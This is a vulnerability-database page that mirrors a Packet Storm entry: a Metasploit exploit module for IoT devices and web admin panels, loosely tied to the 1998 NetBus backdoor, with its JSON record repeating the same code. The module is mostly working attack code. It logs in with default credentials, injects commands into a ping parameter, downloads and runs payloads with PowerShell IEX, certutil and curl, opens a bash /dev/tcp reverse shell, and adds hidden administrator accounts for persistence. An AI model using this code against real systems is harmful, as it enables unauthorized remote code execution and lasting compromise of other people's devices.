📄 Netbus Backdoor 1.7 Remote Code Execution_PACKETSTORM:213315

Description

Netbus Backdoor version 1.7 Metasploit module that leverages an insecure credential storage vulnerability that then performs command injection...

Visit Original Source

Basic Information

ID PACKETSTORM:213315

Published Dec 26, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Netbus Backdoor 1.7 From Legacy to Modern IoT Risks Full RCE Threat |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : System built‑in component. No standalone download available |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/213263/ & MVID-2025-0703

[+] Summary : This document traces the evolution of a Metasploit module concept from an initial theoretical/historical analysis of the 1998 NetBus backdoor to a practical,
modern exploit module targeting insecure credential storage vulnerabilities.
The journey highlights critical distinctions between academic research modules and production-ready exploits.

[+] Evolution of Exploitation Techniques :

1998 NetBus Model
↓
Core Vulnerability: Insecure Credential Storage
↓
Modern Manifestations:

• IoT devices with default passwords
• Web admin panels with hardcoded credentials
• Industrial control systems with backdoor accounts
↓
Modern Exploitation Methods:

• Authentication bypass → Command injection
• File upload → Remote code execution
• Privilege escalation → Persistent access

[+] POC :

##
# This module exploits the "Insecure Credential Storage" vulnerability in modern systems
# Similar to the NetBus principle but in modern web applications
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(update_info(info,
'Name' => 'IoT Device Backdoor Credential RCE',
'Description' => %q{
This module exploits two common vulnerabilities in IoT devices and embedded systems:
1. Insecure credential storage (default/static passwords)
2. Command injection via system management interface

The module simulates a realistic scenario similar to NetBus but in a modern context.
},
'Author' => [
'indoushka',
'Based on NetBus research by John Page (hyp3rlinx)'
],
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://owasp.org/www-community/vulnerabilities/Use_of_hard-coded_password'],
['CWE', '798'], # Use of Hard-coded Credentials
['CWE', '78'], # OS Command Injection
['TTP', 'T1078'], # Valid Accounts
['TTP', 'T1059'] # Command and Scripting Interpreter
],
'Platform' => ['linux', 'unix', 'win'],
'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE],
'Targets' => [
['Linux (x86/x64)', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64] }],
['Linux (ARM)', { 'Platform' => 'linux', 'Arch' => ARCH_ARMLE }],
['Windows', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] }]
],
'Privileged' => true,
'DisclosureDate' => '2023-01-01',
'DefaultTarget' => 0
))

register_options([
OptString.new('TARGETURI', [true, 'Base path to the vulnerable endpoint', '/']),
OptString.new('USERNAME', [true, 'Default/backdoor username', 'admin']),
OptString.new('PASSWORD', [true, 'Default/backdoor password', 'admin']),
OptString.new('BACKDOOR_USER', [false, 'Username to add for persistence', 'backdoor']),
OptString.new('BACKDOOR_PASS', [false, 'Password for the new user', 'P@ssw0rd123!'])
])
end

def check
# Step 1: Check for default credentials
print_status("Checking for default credentials...")

res = send_login_request

if res && res.code == 200 && res.body.include?('success')
return Exploit::CheckCode::Vulnerable
elsif res && res.code == 401
return Exploit::CheckCode::Safe
end

Exploit::CheckCode::Unknown
end

def exploit
print_status("Attempting to exploit insecure credential storage...")

# 1. Authenticate using insecure credentials
unless authenticate
fail_with(Failure::NoAccess, 'Authentication failed')
end

print_good("Successfully authenticated with default credentials!")

# 2. Use appropriate execution method based on target system
case target['Platform']
when 'linux'
exploit_linux
when 'win'
exploit_windows
else
exploit_generic
end
end

private

def send_login_request
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'login.php'),
'vars_post' => {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
},
'headers' => {
'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1)'
}
})
end

def authenticate
print_status("Authenticating as #{datastore['USERNAME']}:#{datastore['PASSWORD']}")

res = send_login_request

if res && res.code == 200
# Check for authentication success in response
if res.body.include?('success') || res.body.include?('dashboard') || res.get_cookies.include?('session')
@auth_cookies = res.get_cookies
return true
end
end

false
end

def exploit_linux
print_status("Target is Linux, using command injection...")

# Method 1: Direct Command Injection
if try_command_injection
return
end

# Method 2: Command Stager (to upload and execute payload)
print_status("Attempting command stager delivery...")

execute_cmdstager(
flavor: :curl,
delay: 0.5
)
end

def exploit_windows
print_status("Target is Windows, using PowerShell/Command Prompt...")

# 1. Try PowerShell
powershell_cmd = "powershell -c \"IEX(New-Object Net.WebClient).DownloadString('http://#{datastore['LHOST']}:#{datastore['SRVPORT']}/shell.ps1')\""

if execute_command(powershell_cmd)
return
end

# 2. Try CertUtil (common alternative in Windows)
certutil_cmd = "certutil -urlcache -f http://#{datastore['LHOST']}:#{datastore['SRVPORT']}/payload.exe C:\\Windows\\Temp\\payload.exe && C:\\Windows\\Temp\\payload.exe"

execute_command(certutil_cmd)
end

def exploit_generic
print_status("Using generic exploitation method...")

# Direct command execution to return Shell
cmd = "bash -c 'bash -i >& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1'"

execute_command(cmd)
end

def try_command_injection
print_status("Testing for command injection...")

test_cmds = [
'; id;',
'| id |',
'`id`',
'$(id)',
'|| id ||'
]

test_cmds.each do |injector|
cmd = "ping #{injector}"
if execute_command(cmd, check_pattern: 'uid=')
return true
end
end

false
end

def execute_command(cmd, opts = {})
uri = normalize_uri(target_uri.path, 'admin', 'ping.php')

# Inject command into parameter
payload = {
'host' => "127.0.0.1 #{cmd}",
'count' => '1'
}

res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'cookie' => @auth_cookies,
'vars_post' => payload,
'timeout' => 5
})

if opts[:check_pattern] && res && res.body.include?(opts[:check_pattern])
print_good("Command injection successful!")
print_line("Output: #{res.body}")
return true
end

false
rescue ::Exception => e
print_error("Error executing command: #{e.message}")
false
end

# Add user for persistence (Backdoor)
def add_backdoor_user
return unless datastore['BACKDOOR_USER'] && datastore['BACKDOOR_PASS']

print_status("Adding backdoor user #{datastore['BACKDOOR_USER']}...")

case target['Platform']
when 'linux'
cmds = [
"useradd -m -s /bin/bash #{datastore['BACKDOOR_USER']}",
"echo '#{datastore['BACKDOOR_USER']}:#{datastore['BACKDOOR_PASS']}' | chpasswd",
"usermod -aG sudo #{datastore['BACKDOOR_USER']} 2>/dev/null || usermod -aG wheel #{datastore['BACKDOOR_USER']} 2>/dev/null"
]

when 'win'
cmds = [
"net user #{datastore['BACKDOOR_USER']} #{datastore['BACKDOOR_PASS']} /add",
"net localgroup administrators #{datastore['BACKDOOR_USER']} /add"
]
end

cmds.each { |cmd| execute_command(cmd) }

print_good("Backdoor user added successfully!")
end

def on_new_session(client)
super

# After obtaining session, add backdoor user
add_backdoor_user if client.type == 'meterpreter' || client.type == 'shell'

# User tips
print_good("Tips for post-exploitation:")
print_line("1. Check system info: cat /etc/os-release || systeminfo")
print_line("2. Look for interesting files: find / -type f -name '*.txt' -o -name '*.conf' 2>/dev/null")
print_line("3. Check network connections: netstat -antup || ss -tunap")

if datastore['BACKDOOR_USER']
print_line("4. Backdoor credentials: #{datastore['BACKDOOR_USER']} / #{datastore['BACKDOOR_PASS']}")
end
end
end

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-26T17:18:14",
    "description": "Netbus Backdoor version 1.7 Metasploit module that leverages an insecure credential storage vulnerability that then performs command injection...",
    "published": "2025-12-26T00:00:00",
    "modified": "2025-12-26T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Netbus Backdoor 1.7 Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:213315",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Netbus Backdoor 1.7 From Legacy to Modern IoT Risks Full RCE Threat                                                         |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\n    | # Vendor    : System built\u2011in component. No standalone download available                                                                 |\n    =============================================================================================================================================\n    \n    [+] References : https://packetstorm.news/files/id/213263/ & MVID-2025-0703\n    \n    [+] Summary    : This document traces the evolution of a Metasploit module concept from an initial theoretical/historical analysis of the 1998 NetBus backdoor to a practical, \n                     modern exploit module targeting insecure credential storage vulnerabilities. \n    \t\t\t\t The journey highlights critical distinctions between academic research modules and production-ready exploits.\n    \n    [+] Evolution of Exploitation Techniques :\n    \n    1998 NetBus Model\n        \u2193\n    Core Vulnerability: Insecure Credential Storage\n        \u2193\n    Modern Manifestations:\n    \n    \u2022 IoT devices with default passwords\n    \u2022 Web admin panels with hardcoded credentials  \n    \u2022 Industrial control systems with backdoor accounts\n        \u2193\n    Modern Exploitation Methods:\n    \n    \u2022 Authentication bypass \u2192 Command injection\n    \u2022 File upload \u2192 Remote code execution\n    \u2022 Privilege escalation \u2192 Persistent access\n    \n    [+] POC :\n    \n    ##\n    # This module exploits the \"Insecure Credential Storage\" vulnerability in modern systems\n    # Similar to the NetBus principle but in modern web applications\n    ##\n    \n    class MetasploitModule < Msf::Exploit::Remote\n      Rank = ExcellentRanking\n    \n      include Msf::Exploit::Remote::HttpClient\n      include Msf::Exploit::CmdStager\n    \n      def initialize(info = {})\n        super(update_info(info,\n          'Name'           => 'IoT Device Backdoor Credential RCE',\n          'Description'    => %q{\n            This module exploits two common vulnerabilities in IoT devices and embedded systems:\n            1. Insecure credential storage (default/static passwords)\n            2. Command injection via system management interface\n    \n            The module simulates a realistic scenario similar to NetBus but in a modern context.\n          },\n          'Author'         => [\n            'indoushka',\n            'Based on NetBus research by John Page (hyp3rlinx)'\n          ],\n          'License'        => MSF_LICENSE,\n          'References'     => [\n            ['URL', 'https://owasp.org/www-community/vulnerabilities/Use_of_hard-coded_password'],\n            ['CWE', '798'],  # Use of Hard-coded Credentials\n            ['CWE', '78'],   # OS Command Injection\n            ['TTP', 'T1078'], # Valid Accounts\n            ['TTP', 'T1059']  # Command and Scripting Interpreter\n          ],\n          'Platform'       => ['linux', 'unix', 'win'],\n          'Arch'           => [ARCH_X86, ARCH_X64, ARCH_ARMLE],\n          'Targets'        => [\n            ['Linux (x86/x64)', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64] }],\n            ['Linux (ARM)',    { 'Platform' => 'linux', 'Arch' => ARCH_ARMLE }],\n            ['Windows',        { 'Platform' => 'win',   'Arch' => [ARCH_X86, ARCH_X64] }]\n          ],\n          'Privileged'     => true,\n          'DisclosureDate' => '2023-01-01',\n          'DefaultTarget'  => 0\n        ))\n    \n        register_options([\n          OptString.new('TARGETURI', [true, 'Base path to the vulnerable endpoint', '/']),\n          OptString.new('USERNAME', [true, 'Default/backdoor username', 'admin']),\n          OptString.new('PASSWORD', [true, 'Default/backdoor password', 'admin']),\n          OptString.new('BACKDOOR_USER', [false, 'Username to add for persistence', 'backdoor']),\n          OptString.new('BACKDOOR_PASS', [false, 'Password for the new user', 'P@ssw0rd123!'])\n        ])\n      end\n    \n      def check\n        # Step 1: Check for default credentials\n        print_status(\"Checking for default credentials...\")\n        \n        res = send_login_request\n        \n        if res && res.code == 200 && res.body.include?('success')\n          return Exploit::CheckCode::Vulnerable\n        elsif res && res.code == 401\n          return Exploit::CheckCode::Safe\n        end\n        \n        Exploit::CheckCode::Unknown\n      end\n    \n      def exploit\n        print_status(\"Attempting to exploit insecure credential storage...\")\n        \n        # 1. Authenticate using insecure credentials\n        unless authenticate\n          fail_with(Failure::NoAccess, 'Authentication failed')\n        end\n        \n        print_good(\"Successfully authenticated with default credentials!\")\n        \n        # 2. Use appropriate execution method based on target system\n        case target['Platform']\n        when 'linux'\n          exploit_linux\n        when 'win'\n          exploit_windows\n        else\n          exploit_generic\n        end\n      end\n    \n      private\n    \n      def send_login_request\n        send_request_cgi({\n          'method'   => 'POST',\n          'uri'      => normalize_uri(target_uri.path, 'login.php'),\n          'vars_post' => {\n            'username' => datastore['USERNAME'],\n            'password' => datastore['PASSWORD']\n          },\n          'headers'  => {\n            'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1)'\n          }\n        })\n      end\n    \n      def authenticate\n        print_status(\"Authenticating as #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n        \n        res = send_login_request\n        \n        if res && res.code == 200\n          # Check for authentication success in response\n          if res.body.include?('success') || res.body.include?('dashboard') || res.get_cookies.include?('session')\n            @auth_cookies = res.get_cookies\n            return true\n          end\n        end\n        \n        false\n      end\n    \n      def exploit_linux\n        print_status(\"Target is Linux, using command injection...\")\n        \n        # Method 1: Direct Command Injection\n        if try_command_injection\n          return\n        end\n        \n        # Method 2: Command Stager (to upload and execute payload)\n        print_status(\"Attempting command stager delivery...\")\n        \n        execute_cmdstager(\n          flavor: :curl,\n          delay: 0.5\n        )\n      end\n    \n      def exploit_windows\n        print_status(\"Target is Windows, using PowerShell/Command Prompt...\")\n        \n        # 1. Try PowerShell\n        powershell_cmd = \"powershell -c \\\"IEX(New-Object Net.WebClient).DownloadString('http://#{datastore['LHOST']}:#{datastore['SRVPORT']}/shell.ps1')\\\"\"\n        \n        if execute_command(powershell_cmd)\n          return\n        end\n        \n        # 2. Try CertUtil (common alternative in Windows)\n        certutil_cmd = \"certutil -urlcache -f http://#{datastore['LHOST']}:#{datastore['SRVPORT']}/payload.exe C:\\\\Windows\\\\Temp\\\\payload.exe && C:\\\\Windows\\\\Temp\\\\payload.exe\"\n        \n        execute_command(certutil_cmd)\n      end\n    \n      def exploit_generic\n        print_status(\"Using generic exploitation method...\")\n        \n        # Direct command execution to return Shell\n        cmd = \"bash -c 'bash -i >& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1'\"\n        \n        execute_command(cmd)\n      end\n    \n      def try_command_injection\n        print_status(\"Testing for command injection...\")\n        \n        test_cmds = [\n          '; id;', \n          '| id |',\n          '`id`',\n          '$(id)',\n          '|| id ||'\n        ]\n        \n        test_cmds.each do |injector|\n          cmd = \"ping #{injector}\"\n          if execute_command(cmd, check_pattern: 'uid=')\n            return true\n          end\n        end\n        \n        false\n      end\n    \n      def execute_command(cmd, opts = {})\n        uri = normalize_uri(target_uri.path, 'admin', 'ping.php')\n        \n        # Inject command into parameter\n        payload = {\n          'host' => \"127.0.0.1 #{cmd}\",\n          'count' => '1'\n        }\n        \n        res = send_request_cgi({\n          'method'    => 'POST',\n          'uri'       => uri,\n          'cookie'    => @auth_cookies,\n          'vars_post' => payload,\n          'timeout'   => 5\n        })\n        \n        if opts[:check_pattern] && res && res.body.include?(opts[:check_pattern])\n          print_good(\"Command injection successful!\")\n          print_line(\"Output: #{res.body}\")\n          return true\n        end\n        \n        false\n      rescue ::Exception => e\n        print_error(\"Error executing command: #{e.message}\")\n        false\n      end\n    \n      # Add user for persistence (Backdoor)\n      def add_backdoor_user\n        return unless datastore['BACKDOOR_USER'] && datastore['BACKDOOR_PASS']\n        \n        print_status(\"Adding backdoor user #{datastore['BACKDOOR_USER']}...\")\n        \n        case target['Platform']\n        when 'linux'\n          cmds = [\n            \"useradd -m -s /bin/bash #{datastore['BACKDOOR_USER']}\",\n            \"echo '#{datastore['BACKDOOR_USER']}:#{datastore['BACKDOOR_PASS']}' | chpasswd\",\n            \"usermod -aG sudo #{datastore['BACKDOOR_USER']} 2>/dev/null || usermod -aG wheel #{datastore['BACKDOOR_USER']} 2>/dev/null\"\n          ]\n          \n        when 'win'\n          cmds = [\n            \"net user #{datastore['BACKDOOR_USER']} #{datastore['BACKDOOR_PASS']} /add\",\n            \"net localgroup administrators #{datastore['BACKDOOR_USER']} /add\"\n          ]\n        end\n        \n        cmds.each { |cmd| execute_command(cmd) }\n        \n        print_good(\"Backdoor user added successfully!\")\n      end\n    \n      def on_new_session(client)\n        super\n        \n        # After obtaining session, add backdoor user\n        add_backdoor_user if client.type == 'meterpreter' || client.type == 'shell'\n        \n        # User tips\n        print_good(\"Tips for post-exploitation:\")\n        print_line(\"1. Check system info: cat /etc/os-release || systeminfo\")\n        print_line(\"2. Look for interesting files: find / -type f -name '*.txt' -o -name '*.conf' 2>/dev/null\")\n        print_line(\"3. Check network connections: netstat -antup || ss -tunap\")\n        \n        if datastore['BACKDOOR_USER']\n          print_line(\"4. Backdoor credentials: #{datastore['BACKDOOR_USER']} / #{datastore['BACKDOOR_PASS']}\")\n        end\n      end\n    end\n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/213315",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/213315/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply